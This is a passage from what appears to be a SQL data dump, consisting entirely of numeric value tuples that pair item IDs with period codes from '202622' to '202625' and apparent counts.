6),(1699,1,'202622',6),(1707,1,'202622',6),(1730,1,'202622',6),(1772,1,'202622',6),(2063,1,'202622',6),(2154,1,'202622',6),(2252,1,'202622',6),(2801,1,'202622',6),(3005,1,'202622',6),(3034,1,'202622',6),(3045,1,'202622',6),(3063,1,'202622',6),(3079,1,'202622',6),(3107,1,'202622',6),(3109,1,'202622',6),(3226,1,'202622',6),(3257,1,'202622',6),(3290,1,'202622',6),(3316,1,'202622',6),(3479,1,'202622',6),(3714,1,'202622',6),(3724,1,'202622',6),(3752,1,'202622',6),(4329,1,'202622',6),(4341,1,'202622',6),(4424,1,'202622',6),(4440,1,'202622',6),(4703,1,'202622',6),(4874,1,'202622',6),(4897,1,'202622',6),(4976,1,'202622',6),(4980,1,'202622',6),(5323,1,'202622',6),(5605,1,'202622',6),(106,1,'202622',7),(110,1,'202622',7),(472,1,'202622',7),(477,1,'202622',7),(486,1,'202622',7),(1596,1,'202622',7),(1713,1,'202622',7),(1715,1,'202622',7),(1720,1,'202622',7),(1726,1,'202622',7),(1747,1,'202622',7),(1766,1,'202622',7),(2152,1,'202622',7),(2156,1,'202622',7),(2293,1,'202622',7),(2964,1,'202622',7),(2965,1,'202622',7),(3066,1,'202622',7),(3251,1,'202622',7),(3265,1,'202622',7),(3285,1,'202622',7),(3287,1,'202622',7),(3486,1,'202622',7),(3489,1,'202622',7),(3534,1,'202622',7),(3746,1,'202622',7),(3774,1,'202622',7),(4275,1,'202622',7),(4301,1,'202622',7),(4363,1,'202622',7),(4382,1,'202622',7),(4396,1,'202622',7),(4428,1,'202622',7),(4444,1,'202622',7),(4454,1,'202622',7),(4517,1,'202622',7),(4648,1,'202622',7),(4691,1,'202622',7),(4762,1,'202622',7),(4862,1,'202622',7),(4883,1,'202622',7),(5042,1,'202622',7),(5046,1,'202622',7),(5248,1,'202622',7),(5253,1,'202622',7),(5271,1,'202622',7),(5304,1,'202622',7),(5317,1,'202622',7),(5356,1,'202622',7),(5383,1,'202622',7),(5412,1,'202622',7),(5428,1,'202622',7),(5441,1,'202622',7),(5464,1,'202622',7),(5578,1,'202622',7),(5601,1,'202622',7),(469,1,'202622',8),(476,1,'202622',8),(478,1,'202622',8),(480,1,'202622',8),(484,1,'202622',8),(1592,1,'202622',8),(1604,1,'202622',8),(1695,1,'202622',8),(1697,1,'202622',8),(1711,1,'202622',8),(1734,1,'202622',8),(1749,1,'202622',8),(1770,1,'202622',8),(1776,1,'202622',8),(2148,1,'202622',8),(2150,1,'202622',8),(2161,1,'202622',8),(2296,1,'202622',8),(2804,1,'202622',8),(2809,1,'202622',8),(3027,1,'202622',8),(3041,1,'202622',8),(3087,1,'202622',8),(3092,1,'202622',8),(3127,1,'202622',8),(3261,1,'202622',8),(3282,1,'202622',8),(3721,1,'202622',8),(3727,1,'202622',8),(3731,1,'202622',8),(3735,1,'202622',8),(3738,1,'202622',8),(3749,1,'202622',8),(3777,1,'202622',8),(4338,1,'202622',8),(4373,1,'202622',8),(4387,1,'202622',8),(4416,1,'202622',8),(4514,1,'202622',8),(4524,1,'202622',8),(4546,1,'202622',8),(4582,1,'202622',8),(4651,1,'202622',8),(4668,1,'202622',8),(4771,1,'202622',8),(4858,1,'202622',8),(5125,1,'202622',8),(5131,1,'202622',8),(5134,1,'202622',8),(5137,1,'202622',8),(5157,1,'202622',8),(5280,1,'202622',8),(5295,1,'202622',8),(5314,1,'202622',8),(5320,1,'202622',8),(5415,1,'202622',8),(5433,1,'202622',8),(5449,1,'202622',8),(5457,1,'202622',8),(5512,1,'202622',8),(5585,1,'202622',8),(5636,1,'202622',8),(5666,1,'202622',8),(5738,1,'202622',8),(471,1,'202622',9),(1606,1,'202622',9),(1608,1,'202622',9),(1722,1,'202622',9),(2248,1,'202622',9),(2309,1,'202622',9),(2609,1,'202622',9),(2748,1,'202622',9),(2989,1,'202622',9),(2993,1,'202622',9),(3006,1,'202622',9),(3023,1,'202622',9),(3117,1,'202622',9),(3240,1,'202622',9),(3243,1,'202622',9),(3247,1,'202622',9),(3253,1,'202622',9),(3259,1,'202622',9),(3263,1,'202622',9),(3531,1,'202622',9),(3710,1,'202622',9),(3742,1,'202622',9),(4357,1,'202622',9),(4391,1,'202622',9),(4412,1,'202622',9),(4448,1,'202622',9),(4587,1,'202622',9),(4608,1,'202622',9),(4685,1,'202622',9),(4694,1,'202622',9),(4697,1,'202622',9),(4700,1,'202622',9),(4768,1,'202622',9),(4802,1,'202622',9),(4888,1,'202622',9),(5028,1,'202622',9),(5037,1,'202622',9),(5050,1,'202622',9),(5080,1,'202622',9),(5122,1,'202622',9),(5301,1,'202622',9),(5326,1,'202622',9),(5334,1,'202622',9),(5378,1,'202622',9),(5771,1,'202622',9),(5785,1,'202622',9),(5816,1,'202622',9),(102,1,'202622',10),(483,1,'202622',10),(1590,1,'202622',10),(1737,1,'202622',10),(1739,1,'202622',10),(1745,1,'202622',10),(1751,1,'202622',10),(1768,1,'202622',10),(2159,1,'202622',10),(2775,1,'202622',10),(2813,1,'202622',10),(2911,1,'202622',10),(3038,1,'202622',10),(3090,1,'202622',10),(3096,1,'202622',10),(3124,1,'202622',10),(3269,1,'202622',10),(3280,1,'202622',10),(3313,1,'202622',10),(3438,1,'202622',10),(3498,1,'202622',10),(3541,1,'202622',10),(4238,1,'202622',10),(4400,1,'202622',10),(4404,1,'202622',10),(4432,1,'202622',10),(4542,1,'202622',10),(4551,1,'202622',10),(4645,1,'202622',10),(4657,1,'202622',10),(4709,1,'202622',10),(4722,1,'202622',10),(4750,1,'202622',10),(4756,1,'202622',10),(4797,1,'202622',10),(4878,1,'202622',10),(4893,1,'202622',10),(4988,1,'202622',10),(5024,1,'202622',10),(5067,1,'202622',10),(5101,1,'202622',10),(5259,1,'202622',10),(5298,1,'202622',10),(5310,1,'202622',10),(5425,1,'202622',10),(5492,1,'202622',10),(5561,1,'202622',10),(5567,1,'202622',10),(5662,1,'202622',10),(5674,1,'202622',10),(5696,1,'202622',10),(5865,1,'202622',10),(1544,1,'202622',11),(1584,1,'202622',11),(1586,1,'202622',11),(1598,1,'202622',11),(2617,1,'202622',11),(2991,1,'202622',11),(3030,1,'202622',11),(3229,1,'202622',11),(3267,1,'202622',11),(3275,1,'202622',11),(3278,1,'202622',11),(3297,1,'202622',11),(3307,1,'202622',11),(3430,1,'202622',11),(4368,1,'202622',11),(4660,1,'202622',11),(4712,1,'202622',11),(4870,1,'202622',11),(4983,1,'202622',11),(5033,1,'202622',11),(5062,1,'202622',11),(5256,1,'202622',11),(5292,1,'202622',11),(5307,1,'202622',11),(5454,1,'202622',11),(5461,1,'202622',11),(5467,1,'202622',11),(5735,1,'202622',11),(1718,1,'202622',12),(1743,1,'202622',12),(1780,1,'202622',12),(2297,1,'202622',12),(2457,1,'202622',12),(2956,1,'202622',12),(3764,1,'202622',12),(4408,1,'202622',12),(4420,1,'202622',12),(4436,1,'202622',12),(4591,1,'202622',12),(4677,1,'202622',12),(4747,1,'202622',12),(5353,1,'202622',12),(5570,1,'202622',12),(5598,1,'202622',12),(5626,1,'202622',12),(5700,1,'202622',12),(1600,1,'202622',13),(1610,1,'202622',13),(1703,1,'202622',13),(1741,1,'202622',13),(1782,1,'202622',13),(2769,1,'202622',13),(3097,1,'202622',13),(3249,1,'202622',13),(3271,1,'202622',13),(4377,1,'202622',13),(4529,1,'202622',13),(4566,1,'202622',13),(4663,1,'202622',13),(4753,1,'202622',13),(4866,1,'202622',13),(5146,1,'202622',13),(5163,1,'202622',13),(5264,1,'202622',13),(5363,1,'202622',13),(5409,1,'202622',13),(5833,1,'202622',13),(5844,1,'202622',13),(5847,1,'202622',13),(5889,1,'202622',13),(5917,1,'202622',13),(5921,1,'202622',13),(1728,1,'202622',14),(2751,1,'202622',14),(4612,1,'202622',14),(4759,1,'202622',14),(4776,1,'202622',14),(5020,1,'202622',14),(5058,1,'202622',14),(5128,1,'202622',14),(5400,1,'202622',14),(5762,1,'202622',14),(5821,1,'202622',14),(5875,1,'202622',14),(570,1,'202622',15),(1705,1,'202622',15),(3004,1,'202622',15),(3083,1,'202622',15),(4792,1,'202622',15),(5436,1,'202622',15),(5515,1,'202622',15),(5778,1,'202622',15),(1588,1,'202622',16),(2704,1,'202622',16),(5359,1,'202622',16),(5593,1,'202622',16),(5859,1,'202622',16),(5868,1,'202622',16),(5872,1,'202622',16),(1612,1,'202622',17),(1724,1,'202622',17),(4556,1,'202622',17),(5054,1,'202622',17),(5881,1,'202622',17),(4332,1,'202622',18),(5276,1,'202622',18),(2658,1,'202622',19),(5071,1,'202622',19),(5397,1,'202622',19),(5420,1,'202622',19),(5502,1,'202622',19),(5930,1,'202622',19),(1602,1,'202622',20),(1774,1,'202622',20),(4335,1,'202622',20),(4520,1,'202622',20),(5769,1,'202622',20),(3273,1,'202622',21),(5824,1,'202622',21),(473,1,'202622',22),(1614,1,'202622',22),(5076,1,'202622',22),(5406,1,'202622',22),(5925,1,'202622',22),(5878,1,'202622',23),(74,1,'202622',24),(1778,1,'202622',24),(3102,1,'202622',24),(4930,1,'202622',24),(2558,1,'202622',25),(468,1,'202622',26),(487,1,'202622',26),(2904,1,'202622',27),(3781,1,'202622',27),(108,1,'202622',28),(1582,1,'202622',29),(84,1,'202622',30),(335,1,'202622',30),(87,1,'202622',32),(5489,1,'202622',32),(474,1,'202622',33),(5828,1,'202622',33),(5884,1,'202622',33),(470,1,'202622',36),(3060,1,'202622',37),(2503,1,'202622',38),(89,1,'202622',54),(5902,1,'202622',56),(5910,1,'202622',57),(76,1,'202622',62),(5906,1,'202622',70),(68,1,'202622',72),(72,1,'202622',118),(91,1,'202622',145),(80,1,'202622',300),(9,1,'202622',5739),(470,1,'202623',1),(479,1,'202623',1),(482,1,'202623',1),(486,1,'202623',1),(1590,1,'202623',1),(1697,1,'202623',1),(1726,1,'202623',1),(1730,1,'202623',1),(1732,1,'202623',1),(1739,1,'202623',1),(1768,1,'202623',1),(2252,1,'202623',1),(2609,1,'202623',1),(2617,1,'202623',1),(2775,1,'202623',1),(2809,1,'202623',1),(2911,1,'202623',1),(2993,1,'202623',1),(3104,1,'202623',1),(3109,1,'202623',1),(3127,1,'202623',1),(3226,1,'202623',1),(3240,1,'202623',1),(3245,1,'202623',1),(3265,1,'202623',1),(3275,1,'202623',1),(3280,1,'202623',1),(3282,1,'202623',1),(3307,1,'202623',1),(3438,1,'202623',1),(3486,1,'202623',1),(3724,1,'202623',1),(3738,1,'202623',1),(3746,1,'202623',1),(3749,1,'202623',1),(4329,1,'202623',1),(4332,1,'202623',1),(4363,1,'202623',1),(4368,1,'202623',1),(4377,1,'202623',1),(4391,1,'202623',1),(4408,1,'202623',1),(4416,1,'202623',1),(4432,1,'202623',1),(4448,1,'202623',1),(4546,1,'202623',1),(4566,1,'202623',1),(4587,1,'202623',1),(4591,1,'202623',1),(4700,1,'202623',1),(4741,1,'202623',1),(4762,1,'202623',1),(4768,1,'202623',1),(4792,1,'202623',1),(4802,1,'202623',1),(4883,1,'202623',1),(4897,1,'202623',1),(4988,1,'202623',1),(5046,1,'202623',1),(5050,1,'202623',1),(5131,1,'202623',1),(5146,1,'202623',1),(5157,1,'202623',1),(5301,1,'202623',1),(5317,1,'202623',1),(5330,1,'202623',1),(5412,1,'202623',1),(5472,1,'202623',1),(102,1,'202623',2),(106,1,'202623',2),(467,1,'202623',2),(471,1,'202623',2),(483,1,'202623',2),(485,1,'202623',2),(488,1,'202623',2),(1695,1,'202623',2),(1699,1,'202623',2),(1707,1,'202623',2),(1711,1,'202623',2),(1720,1,'202623',2),(1737,1,'202623',2),(1741,1,'202623',2),(1749,1,'202623',2),(1770,1,'202623',2),(1772,1,'202623',2),(1780,1,'202623',2),(2063,1,'202623',2),(2154,1,'202623',2),(2161,1,'202623',2),(2293,1,'202623',2),(2309,1,'202623',2),(2751,1,'202623',2),(2956,1,'202623',2),(2964,1,'202623',2),(2965,1,'202623',2),(2989,1,'202623',2),(3027,1,'202623',2),(3045,1,'202623',2),(3066,1,'202623',2),(3087,1,'202623',2),(3092,1,'202623',2),(3096,1,'202623',2),(3243,1,'202623',2),(3249,1,'202623',2),(3251,1,'202623',2),(3257,1,'202623',2),(3259,1,'202623',2),(3267,1,'202623',2),(3273,1,'202623',2),(3278,1,'202623',2),(3285,1,'202623',2),(3313,1,'202623',2),(3479,1,'202623',2),(3482,1,'202623',2),(3489,1,'202623',2),(3531,1,'202623',2),(3541,1,'202623',2),(3714,1,'202623',2),(3721,1,'202623',2),(3727,1,'202623',2),(3774,1,'202623',2),(4373,1,'202623',2),(4396,1,'202623',2),(4400,1,'202623',2),(4424,1,'202623',2),(4514,1,'202623',2),(4551,1,'202623',2),(4582,1,'202623',2),(4612,1,'202623',2),(4657,1,'202623',2),(4663,1,'202623',2),(4668,1,'202623',2),(4681,1,'202623',2),(4685,1,'202623',2),(4691,1,'202623',2),(4694,1,'202623',2),(4703,1,'202623',2),(4709,1,'202623',2),(4722,1,'202623',2),(4759,1,'202623',2),(4765,1,'202623',2),(4797,1,'202623',2),(4866,1,'202623',2),(4870,1,'202623',2),(4976,1,'202623',2),(5080,1,'202623',2),(5122,1,'202623',2),(5134,1,'202623',2),(5137,1,'202623',2),(5289,1,'202623',2),(5295,1,'202623',2),(5304,1,'202623',2),(5334,1,'202623',2),(5461,1,'202623',2),(5515,1,'202623',2),(469,1,'202623',3),(480,1,'202623',3),(484,1,'202623',3),(487,1,'202623',3),(1584,1,'202623',3),(1606,1,'202623',3),(1718,1,'202623',3),(1734,1,'202623',3),(1751,1,'202623',3),(1774,1,'202623',3),(1778,1,'202623',3),(1782,1,'202623',3),(2150,1,'202623',3),(2156,1,'202623',3),(2159,1,'202623',3),(2165,1,'202623',3),(2801,1,'202623',3),(3038,1,'202623',3),(3041,1,'202623',3),(3063,1,'202623',3),(3069,1,'202623',3),(3261,1,'202623',3),(3297,1,'202623',3),(3731,1,'202623',3),(3764,1,'202623',3),(3771,1,'202623',3),(4238,1,'202623',3),(4275,1,'202623',3),(4440,1,'202623',3),(4457,1,'202623',3),(4645,1,'202623',3),(4688,1,'202623',3),(4697,1,'202623',3),(4750,1,'202623',3),(4756,1,'202623',3),(4771,1,'202623',3),(4862,1,'202623',3),(4874,1,'202623',3),(4980,1,'202623',3),(4996,1,'202623',3),(5020,1,'202623',3),(5028,1,'202623',3),(5033,1,'202623',3),(5037,1,'202623',3),(5054,1,'202623',3),(5101,1,'202623',3),(5125,1,'202623',3),(5128,1,'202623',3),(5292,1,'202623',3),(5307,1,'202623',3),(5310,1,'202623',3),(5363,1,'202623',3),(5374,1,'202623',3),(5464,1,'202623',3),(5561,1,'202623',3),(5585,1,'202623',3),(5601,1,'202623',3),(5605,1,'202623',3),(5626,1,'202623',3),(5666,1,'202623',3),(5875,1,'202623',3),(5889,1,'202623',3),(473,1,'202623',4),(476,1,'202623',4),(477,1,'202623',4),(481,1,'202623',4),(1596,1,'202623',4),(1610,1,'202623',4),(1701,1,'202623',4),(1705,1,'202623',4),(1766,1,'202623',4),(2152,1,'202623',4),(2804,1,'202623',4),(3004,1,'202623',4),(3023,1,'202623',4),(3030,1,'202623',4),(3034,1,'202623',4),(3072,1,'202623',4),(3117,1,'202623',4),(3247,1,'202623',4),(3253,1,'202623',4),(3287,1,'202623',4),(3430,1,'202623',4),(3498,1,'202623',4),(4323,1,'202623',4),(4326,1,'202623',4),(4338,1,'202623',4),(4382,1,'202623',4),(4404,1,'202623',4),(4412,1,'202623',4),(4420,1,'202623',4),(4517,1,'202623',4),(4520,1,'202623',4),(4542,1,'202623',4),(4654,1,'202623',4),(4660,1,'202623',4),(4706,1,'202623',4),(4712,1,'202623',4),(4858,1,'202623',4),(4983,1,'202623',4),(5058,1,'202623',4),(5163,1,'202623',4),(5256,1,'202623',4),(5280,1,'202623',4),(5326,1,'202623',4),(5353,1,'202623',4),(5356,1,'202623',4),(5378,1,'202623',4),(5400,1,'202623',4),(5441,1,'202623',4),(5492,1,'202623',4),(5512,1,'202623',4),(5662,1,'202623',4),(110,1,'202623',5),(478,1,'202623',5),(1592,1,'202623',5),(1612,1,'202623',5),(1703,1,'202623',5),(1724,1,'202623',5),(2457,1,'202623',5),(2658,1,'202623',5),(2813,1,'202623',5),(3006,1,'202623',5),(3079,1,'202623',5),(3124,1,'202623',5),(3271,1,'202623',5),(3534,1,'202623',5),(3735,1,'202623',5),(3742,1,'202623',5),(4335,1,'202623',5),(4436,1,'202623',5),(4524,1,'202623',5),(4529,1,'202623',5),(4556,1,'202623',5),(4608,1,'202623',5),(4648,1,'202623',5),(4674,1,'202623',5),(4677,1,'202623',5),(4776,1,'202623',5),(5062,1,'202623',5),(5067,1,'202623',5),(5253,1,'202623',5),(5264,1,'202623',5),(5314,1,'202623',5),(5425,1,'202623',5),(5578,1,'202623',5),(5636,1,'202623',5),(5674,1,'202623',5),(5683,1,'202623',5),(5696,1,'202623',5),(5821,1,'202623',5),(5833,1,'202623',5),(74,1,'202623',6),(1722,1,'202623',6),(2148,1,'202623',6),(2558,1,'202623',6),(3005,1,'202623',6),(3083,1,'202623',6),(3090,1,'202623',6),(3777,1,'202623',6),(4341,1,'202623',6),(4454,1,'202623',6),(4651,1,'202623',6),(5140,1,'202623',6),(5153,1,'202623',6),(5428,1,'202623',6),(5449,1,'202623',6),(5582,1,'202623',6),(5824,1,'202623',6),(5828,1,'202623',6),(5872,1,'202623',6),(1588,1,'202623',7),(1598,1,'202623',7),(1604,1,'202623',7),(1608,1,'202623',7),(1614,1,'202623',7),(1715,1,'202623',7),(1728,1,'202623',7),(3290,1,'202623',7),(3316,1,'202623',7),(3710,1,'202623',7),(4301,1,'202623',7),(4744,1,'202623',7),(5268,1,'202623',7),(5271,1,'202623',7),(5276,1,'202623',7),(5298,1,'202623',7),(5409,1,'202623',7),(5415,1,'202623',7),(5433,1,'202623',7),(5502,1,'202623',7),(5567,1,'202623',7),(5735,1,'202623',7),(5785,1,'202623',7),(5816,1,'202623',7),(5847,1,'202623',7),(5865,1,'202623',7),(5917,1,'202623',7),(468,1,'202623',8),(570,1,'202623',8),(1544,1,'202623',8),(1602,1,'202623',8),(2297,1,'202623',8),(4747,1,'202623',8),(4930,1,'202623',8),(5071,1,'202623',8),(5259,1,'202623',8),(5738,1,'202623',8),(5771,1,'202623',8),(5921,1,'202623',8),(5925,1,'202623',8),(87,1,'202623',9),(108,1,'202623',9),(472,1,'202623',9),(1600,1,'202623',9),(1747,1,'202623',9),(4977,1,'202623',9),(5076,1,'202623',9),(5359,1,'202623',9),(5420,1,'202623',9),(5598,1,'202623',9),(5700,1,'202623',9),(1586,1,'202623',10),(2769,1,'202623',10),(5436,1,'202623',10),(5570,1,'202623',10),(5844,1,'202623',10),(5868,1,'202623',10),(5878,1,'202623',10),(5884,1,'202623',10),(335,1,'202623',11),(474,1,'202623',11),(1594,1,'202623',11),(3060,1,'202623',11),(5406,1,'202623',11),(5457,1,'202623',11),(5762,1,'202623',11),(5778,1,'202623',11),(84,1,'202623',12),(5593,1,'202623',12),(2704,1,'202623',13),(2904,1,'202623',13),(3102,1,'202623',13),(5769,1,'202623',13),(5881,1,'202623',13),(5489,1,'202623',14),(5859,1,'202623',14),(5902,1,'202623',14),(2503,1,'202623',15),(5397,1,'202623',15),(5454,1,'202623',16),(89,1,'202623',18),(1582,1,'202623',20),(3781,1,'202623',20),(5906,1,'202623',20),(76,1,'202623',22),(5930,1,'202623',23),(5910,1,'202623',24),(72,1,'202623',30),(68,1,'202623',35),(91,1,'202623',63),(80,1,'202623',191),(9,1,'202623',3305),(68,1,'202624',1),(102,1,'202624',1),(106,1,'202624',1),(110,1,'202624',1),(1584,1,'202624',1),(1695,1,'202624',1),(1699,1,'202624',1),(1703,1,'202624',1),(1720,1,'202624',1),(1737,1,'202624',1),(1739,1,'202624',1),(1745,1,'202624',1),(1749,1,'202624',1),(2063,1,'202624',1),(2154,1,'202624',1),(2161,1,'202624',1),(2178,1,'202624',1),(2297,1,'202624',1),(2751,1,'202624',1),(2965,1,'202624',1),(3229,1,'202624',1),(3249,1,'202624',1),(3285,1,'202624',1),(3287,1,'202624',1),(3479,1,'202624',1),(3498,1,'202624',1),(3777,1,'202624',1),(4323,1,'202624',1),(4326,1,'202624',1),(4332,1,'202624',1),(4373,1,'202624',1),(4424,1,'202624',1),(4454,1,'202624',1),(4566,1,'202624',1),(4591,1,'202624',1),(4645,1,'202624',1),(4654,1,'202624',1),(4657,1,'202624',1),(4677,1,'202624',1),(4685,1,'202624',1),(4688,1,'202624',1),(4700,1,'202624',1),(4759,1,'202624',1),(4792,1,'202624',1),(4888,1,'202624',1),(4976,1,'202624',1),(5046,1,'202624',1),(5058,1,'202624',1),(5067,1,'202624',1),(5122,1,'202624',1),(5131,1,'202624',1),(5140,1,'202624',1),(5157,1,'202624',1),(5253,1,'202624',1),(5289,1,'202624',1),(5292,1,'202624',1),(5412,1,'202624',1),(5425,1,'202624',1),(5441,1,'202624',1),(5512,1,'202624',1),(5578,1,'202624',1),(5582,1,'202624',1),(5609,1,'202624',1),(5735,1,'202624',1),(5844,1,'202624',1),(479,1,'202624',2),(481,1,'202624',2),(486,1,'202624',2),(1590,1,'202624',2),(1606,1,'202624',2),(1610,1,'202624',2),(1705,1,'202624',2),(1709,1,'202624',2),(1711,1,'202624',2),(1713,1,'202624',2),(1718,1,'202624',2),(1734,1,'202624',2),(1766,1,'202624',2),(2156,1,'202624',2),(2252,1,'202624',2),(2609,1,'202624',2),(2748,1,'202624',2),(2801,1,'202624',2),(2809,1,'202624',2),(2989,1,'202624',2),(2991,1,'202624',2),(2993,1,'202624',2),(3004,1,'202624',2),(3023,1,'202624',2),(3041,1,'202624',2),(3060,1,'202624',2),(3069,1,'202624',2),(3072,1,'202624',2),(3079,1,'202624',2),(3092,1,'202624',2),(3096,1,'202624',2),(3097,1,'202624',2),(3124,1,'202624',2),(3245,1,'202624',2),(3263,1,'202624',2),(3269,1,'202624',2),(3275,1,'202624',2),(3278,1,'202624',2),(3280,1,'202624',2),(3438,1,'202624',2),(3486,1,'202624',2),(3531,1,'202624',2),(3534,1,'202624',2),(3714,1,'202624',2),(3727,1,'202624',2),(3731,1,'202624',2),(3738,1,'202624',2),(3746,1,'202624',2),(3749,1,'202624',2),(3752,1,'202624',2),(4338,1,'202624',2),(4341,1,'202624',2),(4368,1,'202624',2),(4377,1,'202624',2),(4391,1,'202624',2),(4396,1,'202624',2),(4400,1,'202624',2),(4412,1,'202624',2),(4428,1,'202624',2),(4440,1,'202624',2),(4514,1,'202624',2),(4517,1,'202624',2),(4582,1,'202624',2),(4612,1,'202624',2),(4648,1,'202624',2),(4660,1,'202624',2),(4663,1,'202624',2),(4674,1,'202624',2),(4691,1,'202624',2),(4694,1,'202624',2),(4697,1,'202624',2),(4706,1,'202624',2),(4709,1,'202624',2),(4712,1,'202624',2),(4762,1,'202624',2),(4765,1,'202624',2),(4858,1,'202624',2),(4866,1,'202624',2),(4897,1,'202624',2),(5042,1,'202624',2),(5134,1,'202624',2),(5259,1,'202624',2),(5271,1,'202624',2),(5295,1,'202624',2),(5320,1,'202624',2),(5326,1,'202624',2),(5330,1,'202624',2),(5356,1,'202624',2),(5415,1,'202624',2),(5428,1,'202624',2),(5436,1,'202624',2),(5454,1,'202624',2),(5472,1,'202624',2),(5492,1,'202624',2),(5598,1,'202624',2),(5666,1,'202624',2),(5696,1,'202624',2),(5700,1,'202624',2),(5785,1,'202624',2),(480,1,'202624',3),(483,1,'202624',3),(484,1,'202624',3),(485,1,'202624',3),(488,1,'202624',3),(570,1,'202624',3),(1592,1,'202624',3),(1707,1,'202624',3),(1715,1,'202624',3),(1722,1,'202624',3),(1732,1,'202624',3),(1741,1,'202624',3),(1743,1,'202624',3),(1770,1,'202624',3),(2148,1,'202624',3),(2159,1,'202624',3),(2165,1,'202624',3),(2293,1,'202624',3),(2296,1,'202624',3),(2309,1,'202624',3),(2457,1,'202624',3),(2558,1,'202624',3),(2617,1,'202624',3),(2769,1,'202624',3),(2956,1,'202624',3),(2964,1,'202624',3),(3006,1,'202624',3),(3027,1,'202624',3),(3030,1,'202624',3),(3063,1,'202624',3),(3083,1,'202624',3),(3087,1,'202624',3),(3090,1,'202624',3),(3102,1,'202624',3),(3109,1,'202624',3),(3117,1,'202624',3),(3240,1,'202624',3),(3243,1,'202624',3),(3247,1,'202624',3),(3253,1,'202624',3),(3259,1,'202624',3),(3267,1,'202624',3),(3271,1,'202624',3),(3282,1,'202624',3),(3313,1,'202624',3),(3316,1,'202624',3),(3489,1,'202624',3),(3721,1,'202624',3),(3724,1,'202624',3),(3735,1,'202624',3),(3742,1,'202624',3),(3764,1,'202624',3),(3774,1,'202624',3),(4387,1,'202624',3),(4444,1,'202624',3),(4448,1,'202624',3),(4524,1,'202624',3),(4556,1,'202624',3),(4608,1,'202624',3),(4741,1,'202624',3),(4744,1,'202624',3),(4750,1,'202624',3),(4862,1,'202624',3),(4874,1,'202624',3),(4883,1,'202624',3),(4983,1,'202624',3),(4996,1,'202624',3),(5024,1,'202624',3),(5033,1,'202624',3),(5050,1,'202624',3),(5054,1,'202624',3),(5080,1,'202624',3),(5128,1,'202624',3),(5137,1,'202624',3),(5146,1,'202624',3),(5153,1,'202624',3),(5280,1,'202624',3),(5301,1,'202624',3),(5304,1,'202624',3),(5323,1,'202624',3),(5353,1,'202624',3),(5383,1,'202624',3),(5400,1,'202624',3),(5433,1,'202624',3),(5601,1,'202624',3),(5605,1,'202624',3),(5636,1,'202624',3),(5662,1,'202624',3),(5738,1,'202624',3),(5778,1,'202624',3),(5828,1,'202624',3),(471,1,'202624',4),(472,1,'202624',4),(477,1,'202624',4),(478,1,'202624',4),(482,1,'202624',4),(1598,1,'202624',4),(1600,1,'202624',4),(1604,1,'202624',4),(1701,1,'202624',4),(1724,1,'202624',4),(1730,1,'202624',4),(1768,1,'202624',4),(2150,1,'202624',4),(2775,1,'202624',4),(2804,1,'202624',4),(2813,1,'202624',4),(3034,1,'202624',4),(3045,1,'202624',4),(3066,1,'202624',4),(3226,1,'202624',4),(3251,1,'202624',4),(3290,1,'202624',4),(3307,1,'202624',4),(3710,1,'202624',4),(3781,1,'202624',4),(4238,1,'202624',4),(4301,1,'202624',4),(4357,1,'202624',4),(4382,1,'202624',4),(4404,1,'202624',4),(4408,1,'202624',4),(4529,1,'202624',4),(4668,1,'202624',4),(4753,1,'202624',4),(4756,1,'202624',4),(4768,1,'202624',4),(4870,1,'202624',4),(4893,1,'202624',4),(4988,1,'202624',4),(5028,1,'202624',4),(5071,1,'202624',4),(5101,1,'202624',4),(5268,1,'202624',4),(5276,1,'202624',4),(5307,1,'202624',4),(5317,1,'202624',4),(5334,1,'202624',4),(5359,1,'202624',4),(5363,1,'202624',4),(5449,1,'202624',4),(5457,1,'202624',4),(5467,1,'202624',4),(5502,1,'202624',4),(5515,1,'202624',4),(5567,1,'202624',4),(5626,1,'202624',4),(5816,1,'202624',4),(469,1,'202624',5),(1594,1,'202624',5),(1726,1,'202624',5),(1772,1,'202624',5),(2658,1,'202624',5),(2704,1,'202624',5),(2911,1,'202624',5),(3005,1,'202624',5),(3038,1,'202624',5),(3107,1,'202624',5),(3127,1,'202624',5),(3297,1,'202624',5),(4363,1,'202624',5),(4416,1,'202624',5),(4436,1,'202624',5),(4520,1,'202624',5),(4542,1,'202624',5),(4546,1,'202624',5),(4703,1,'202624',5),(4722,1,'202624',5),(4771,1,'202624',5),(4980,1,'202624',5),(5062,1,'202624',5),(5076,1,'202624',5),(5264,1,'202624',5),(5314,1,'202624',5),(5374,1,'202624',5),(5420,1,'202624',5),(5461,1,'202624',5),(5570,1,'202624',5),(5821,1,'202624',5),(5865,1,'202624',5),(5868,1,'202624',5),(5872,1,'202624',5),(5881,1,'202624',5),(5889,1,'202624',5),(5925,1,'202624',5),(467,1,'202624',6),(476,1,'202624',6),(487,1,'202624',6),(1596,1,'202624',6),(1612,1,'202624',6),(1614,1,'202624',6),(1747,1,'202624',6),(1776,1,'202624',6),(3104,1,'202624',6),(4457,1,'202624',6),(4776,1,'202624',6),(5163,1,'202624',6),(5298,1,'202624',6),(5674,1,'202624',6),(5762,1,'202624',6),(5833,1,'202624',6),(5847,1,'202624',6),(5859,1,'202624',6),(5902,1,'202624',6),(473,1,'202624',7),(1586,1,'202624',7),(1588,1,'202624',7),(1728,1,'202624',7),(1780,1,'202624',7),(4420,1,'202624',7),(4747,1,'202624',7),(4977,1,'202624',7),(5310,1,'202624',7),(5585,1,'202624',7),(5769,1,'202624',7),(5875,1,'202624',7),(1544,1,'202624',8),(1778,1,'202624',8),(3541,1,'202624',8),(5125,1,'202624',8),(5464,1,'202624',8),(5921,1,'202624',8),(335,1,'202624',9),(468,1,'202624',9),(1602,1,'202624',9),(5378,1,'202624',9),(5406,1,'202624',9),(5771,1,'202624',9),(5824,1,'202624',9),(5878,1,'202624',9),(5917,1,'202624',9),(474,1,'202624',10),(1608,1,'202624',10),(74,1,'202624',11),(87,1,'202624',11),(108,1,'202624',11),(5884,1,'202624',11),(5910,1,'202624',11),(470,1,'202624',12),(4335,1,'202624',12),(4930,1,'202624',12),(5409,1,'202624',12),(5593,1,'202624',12),(5930,1,'202624',12),(89,1,'202624',13),(76,1,'202624',14),(84,1,'202624',14),(5489,1,'202624',14),(5906,1,'202624',15),(5945,1,'202624',15),(2503,1,'202624',16),(1582,1,'202624',18),(5397,1,'202624',19),(91,1,'202624',31),(72,1,'202624',34),(80,1,'202624',36),(2904,1,'202624',684),(9,1,'202624',1828),(4514,1,'202625',1),(4517,1,'202625',1),(4691,1,'202625',1),(3735,1,'202625',2),(3738,1,'202625',2),(4323,1,'202625',2),(4858,1,'202625',2),(477,1,'202625',3),(2293,1,'202625',3),(3079,1